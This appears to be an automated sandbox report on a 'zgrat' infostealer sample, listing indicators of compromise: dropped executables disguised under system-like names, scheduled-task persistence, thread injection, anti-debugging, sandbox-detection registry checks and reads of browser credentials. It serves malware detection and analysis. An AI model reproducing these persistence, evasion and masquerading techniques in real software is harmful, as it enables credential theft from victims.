zgrat | dc28910bd758fccf7797669d2876da58d58c398d85cb77bf8e8066ba00448b09

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2860750803-256193626-1801997576-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2860750803-256193626-1801997576-1000\Control Panel\International\Geo\Nation	sphyperRuntimedhcpSvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2860750803-256193626-1801997576-1000\Control Panel\International\Geo\Nation	SyncSpoofer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2860750803-256193626-1801997576-1000\Control Panel\International\Geo\Nation	HpsrSpoof.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2860750803-256193626-1801997576-1000\Control Panel\International\Geo\Nation	sphyperRuntimedhcpSvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2860750803-256193626-1801997576-1000\Control Panel\International\Geo\Nation	conhostsft.exe

Executes dropped EXE 64 IoCs

pid	Process
312	HpsrSpoof.exe
4248	sphyperRuntimedhcpSvc.exe
3640	conhostsft.exe
2600	Volumeid64.exe
4884	DevManView.exe
4092	DevManView.exe
3776	DevManView.exe
2060	DevManView.exe
2612	DevManView.exe
952	DevManView.exe
2352	DevManView.exe
4204	DevManView.exe
1988	DevManView.exe
2156	DevManView.exe
1912	DevManView.exe
4260	DevManView.exe
3060	DevManView.exe
464	DevManView.exe
4032	DevManView.exe
1888	.conhostsft.exe
4712	sphyperRuntimedhcpSvc.exe
4820	AMIDEWINx64.exe
3100	AMIDEWINx64.exe
4012	AMIDEWINx64.exe
4168	AMIDEWINx64.exe
2920	AMIDEWINx64.exe
3420	AMIDEWINx64.exe
4600	AMIDEWINx64.exe
2188	AMIDEWINx64.exe
3240	AMIDEWINx64.exe
4336	AMIDEWINx64.exe
3464	.conhostsft.exe
4880	AMIDEWINx64.exe
2704	AMIDEWINx64.exe
4144	AMIDEWINx64.exe
3848	AMIDEWINx64.exe
2112	AMIDEWINx64.exe
752	AMIDEWINx64.exe
628	AMIDEWINx64.exe
1804	AMIDEWINx64.exe
3828	AMIDEWINx64.exe
5012	AMIDEWINx64.exe
2112	AMIDEWINx64.exe
1632	AMIDEWINx64.exe
2908	AMIDEWINx64.exe
5032	AMIDEWINx64.exe
3456	AMIDEWINx64.exe
3364	AMIDEWINx64.exe
4552	AMIDEWINx64.exe
3800	AMIDEWINx64.exe
2948	AMIDEWINx64.exe
2352	AMIDEWINx64.exe
2156	Volumeid64.exe
664	Volumeid64.exe
2472	Volumeid64.exe
4520	Volumeid64.exe
1036	VC_redist.x64.exe
4556	Volumeid64.exe
2512	Volumeid64.exe
920	Volumeid64.exe
2960	Volumeid64.exe
1908	Volumeid64.exe
4060	Volumeid64.exe
2192	Volumeid64.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Enumerates connected drives 3 TTPs 30 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe

Maps connected drives based on registry 3 TTPs 64 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\NextInstance = "0"	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count = "0"	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Delete value	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	VC_redist.x64.exe
File opened for modification	C:\Windows\system32\MRT.exe	.conhostsft.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
4556	SyncSpoofer.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1036 set thread context of 4432	1036	VC_redist.x64.exe	311

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files\Mozilla Firefox\defaults\pref\WmiPrvSE.exe	sphyperRuntimedhcpSvc.exe
File created	C:\Program Files\Mozilla Firefox\defaults\pref\24dbde2999530e	sphyperRuntimedhcpSvc.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\INF\setupapi.dev.log	DevManView.exe
File created	C:\Windows\L2Schemas\wininit.exe	sphyperRuntimedhcpSvc.exe
File created	C:\Windows\L2Schemas\56085415360792	sphyperRuntimedhcpSvc.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	DevManView.exe

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2920	sc.exe
4708	sc.exe
2660	sc.exe
1984	sc.exe
460	sc.exe
624	sc.exe
3996	sc.exe
4556	sc.exe
4436	sc.exe
1976	sc.exe
2916	sc.exe
4984	sc.exe
2300	sc.exe
2576	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 64 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000067\00000000	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\ContainerID	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000065\00000000	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\ClassGuid	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000067\00000000	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Capabilities	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Control	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0066	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Mfg	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\ClassGuid	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Device Parameters	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Driver	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0002	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Control	DevManView.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Service	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000065\00000000	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0065	DevManView.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\UINumber	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\ConfigFlags	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\ContainerID	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\ClassGUID	DevManView.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000067\00000000	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000065\00000000	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0067	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\000E	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000067\00000000	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000066\00000000	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Control	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0066\	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ClassGUID	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000065\00000000	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0065\	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\ContainerID	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM	DevManView.exe
Delete value	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000067\00000000	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\DeviceDesc	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\DeviceDesc	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000066\00000000	DevManView.exe

Creates scheduled task(s) 1 TTPs 15 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

pid	Process
2152	schtasks.exe
4260	schtasks.exe
4032	schtasks.exe
2156	schtasks.exe
4232	schtasks.exe
1448	schtasks.exe
2060	schtasks.exe
2872	schtasks.exe
3492	schtasks.exe
2472	schtasks.exe
2996	schtasks.exe
628	schtasks.exe
1912	schtasks.exe
3868	schtasks.exe
3600	schtasks.exe

Modifies data under HKEY_USERS 46 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
